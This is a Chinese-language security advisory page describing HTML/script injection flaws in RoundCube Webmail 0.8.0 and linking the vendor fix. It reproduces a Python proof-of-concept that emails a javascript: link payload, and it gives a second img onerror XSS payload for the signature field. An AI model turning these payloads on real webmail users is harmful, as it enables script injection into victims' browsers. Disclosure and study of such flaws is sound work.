Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / RoundCube Webmail Larry皮肤邮件主题脚本插入漏洞

发布日期:2012-08-17
更新日期:2012-08-21受影响系统:
RoundCube Webmail 0.X
描述:
--------------------------------------------------------------------------------
RoundCube Webmail是一个基于浏览器的IMAP客户端。RoundCube Webmail 0.8.0及其他版本在实现上存在多个HTML注入漏洞,使用Larry皮肤时,通过邮件主题传递的输入没有正确过滤即被使用,可允许远程攻击者在受影响浏览器中注入和执行HTML和脚本代码。<*来源:Shai rod
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Shai rod ()提供了如下测试方法:
#!/usr/bin/python"""
# Exploit Title: Roundcube Webmail Stored XSS.
# Date: 14/08/2012
# Exploit Author: Shai rod (@NightRang3r)
# Vendor Homepage: http://roundcube.net
# Software Link: http://sourceforge.net/projects/roundcubemail/files/roundcubemail/0.8.0/roundcubemail-0.8.0.tar.gz/download
# Version: 0.8.0
#Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar# Timeline:
#14 Aug 2012: Discovered Vulnerability.
#14 Aug 2012: Opened Ticket #1488613 - http://trac.roundcube.net/ticket/1488613
#15 Aug 2012: Fix added to repo.https://github.com/roundcube/roundcubemail/commit/c086978f6a91eacb339fd2976202fca9dad2ef32
https://github.com/roundcube/roundcubemail/commit/5ef8e4ad9d3ee8689d2b83750aa65395b7cd59ee
About the Application:
======================Roundcube is a free and open source webmail solution with a desktop-like user interface which is easy to install/configure and that runs on a standard LAMPP
server. The skins use the latest web standards such as XHTML and CSS 2. Roundcube includes other sophisticated open-source libraries such as PEAR,
an IMAP library derived from IlohaMail the TinyMCE rich text editor, Googiespell library for spell checking or the WasHTML sanitizer by Frederic Motte.Vulnerability Description
=========================1. Stored XSS in e-mail body.XSS Payload: <a href=javascript:alert("XSS")>POC MAIL</a>Send an email to the victim with the payload in the email body, Once the user clicks on the url the XSS should be triggered.2. Self XSS in e-mail body (Signature).XSS Payload: "><img src="1.jpg"onerror=javascript:alert("XSS")>In order to trigger this XSS you should insert the payload into your signature.Settings -> Identities -> Your Identitiy -> Signature
Now create a new mail, XSS Should be triggered."""import smtplibprint "###############################################"
print "#       Roundcube 0.8.0 Stored XSS POC        #"
print "#             Coded by: Shai rod              #"
print "#               @NightRang3r                  #"
print "#           http://exploit.co.il              #"
print "#       For Educational Purposes Only!        #"
print "############################################### "# SETTINGSsender = "attacker@localhost"
smtp_login = sender
smtp_password = "qwe123"
recipient = "victim@localhost"
smtp_server  = "192.168.1.10"
smtp_port = 25
subject = "Roundcube Webmail XSS POC"
# SEND E-MAILprint "[*] Sending E-mail to " + recipient + "..."
msg = ("From: %s To: %s Subject: %s "
       % (sender, ", ".join(recipient), subject) )
msg += "Content-type: text/html "
msg += """<a href=javascript:alert("XSS")>Click Me, Please...</a> """
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo()
server.starttls()
server.login(smtp_login, smtp_password)
server.sendmail(sender, recipient, msg)
server.quit()
print "[+] E-mail sent!"建议:
--------------------------------------------------------------------------------
厂商补丁:RoundCube
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://roundcube.net/RoundCube Webmail "href"邮件体HTML注入漏洞ACPID电源按钮事件本地权限提升漏洞相关资讯      RoundCube Webmail  脚本插入漏洞 
  • Roundcube Webmail 1.2发布,支持  (05月24日)
  • Roundcube Webmail多个安全漏洞  (07/14/2015 21:13:51)
  • RoundCube Webmail “Edit Email”  (08/28/2013 19:35:38)
  • Roundcube webmail跨站脚本漏洞(  (11/11/2015 12:09:31)
  • Roundcube Webmail 1.0.0 (首个稳  (04/09/2014 08:22:39)
  • Roundcube Webmail 0.9.2 发布  (06/18/2013 10:09:07)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载